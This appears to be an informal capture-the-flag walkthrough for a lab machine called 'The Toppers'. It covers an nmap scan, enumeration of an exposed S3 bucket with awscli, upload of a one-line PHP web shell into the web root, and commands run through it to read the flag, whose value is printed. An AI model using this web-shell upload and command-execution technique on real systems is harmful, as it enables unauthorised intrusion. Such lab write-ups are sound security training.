в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ nmap -sV -sC 10.129.*.* -p- 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-09 11:16 EDT
Nmap scan report for 10.129.*.*
Host is up (0.050s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA)
|   256 e6:0f:1a:f6:32:8a:40:ef:2d:a7:3b:22:d1:c7:14:fa (ECDSA)
|_  256 2d:e1:87:41:75:f3:91:54:41:16:b7:2b:80:c6:8f:05 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Toppers
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.14 seconds

In the description there is 2 sentences:
"Please wait for a few minutes until all machine related services are up and running.
Expect to see {"status":"running"} when visiting s3.thetoppers.htb"

So we have to setup the hosts file again before we load the page.
sudo nano /etc/hosts

And copy this here:
10.129.*.*     s3.thetoppers.htb

After that as ur solving the tab, u will figure out, that the s3 subdomain mean its running an Amazon S3 service..

Which mean we can interact with this service with "awscli":
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ aws --endpoint-url http://s3.thetoppers.htb s3 ls
2026-03-09 11:16:23 thetoppers.htb

This means we communicated with the service and we have a 'thetoppers.htb' named bucket...So...
Lets chech this bucket...whats in it:
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ aws --endpoint-url http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
                           PRE images/
2026-03-09 11:16:23          0 .htaccess
2026-03-09 11:16:23      11952 index.php

BOO we got the jackpot, this response means it's the root directory of the webpage...So... lets write a little payload...

Create a new php file, and copy this into it:
<?php system($_GET["cmd"]); ?>

Now, run this payload:
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~/htb]
в””в”Ђ$ aws --endpoint-url http://s3.thetoppers.htb s3 cp payload.php s3://thetoppers.htb/
upload: ./payload.php to s3://thetoppers.htb/payload.php 

We just won. It's uploaded.

Before we get to the cmd, which we created...we have to add the bucket to the hosts, so:
sudo nano /etc/hosts
10.129.*.*     s3.thetoppers.htb  thetoppers.htb

Now open the browser and lets see this url:
http://thetoppers.htb/payload.php?cmd=id
And we got:
uid=33(www-data) gid=33(www-data) groups=33(www-data) 

So our payload works...
Next move is to find the flag:
http://thetoppers.htb/payload.php?cmd=ls%20/home
the response: svc, so:
http://thetoppers.htb/payload.php?cmd=ls%20-la%20/home/svc
There is nothing....check the webpages directory:
http://thetoppers.htb/payload.php?cmd=ls%20-la%20/var/www
AND we've found it!!!
total 16 drwxr-xr-x 3 root root 4096 Jul 19 2022 . drwxr-xr-x 13 root root 4096 Jul 19 2022 .. -rw-r----- 1 root www-data 33 Jul 19 2022 flag.txt drwxr-xr-x 3 root root 4096 Mar 9 15:58 html 
Lets get it:
http://thetoppers.htb/payload.php?cmd=cat /var/www/flag.txt
a980d99281a28d638ac68b9bf9453c2b 
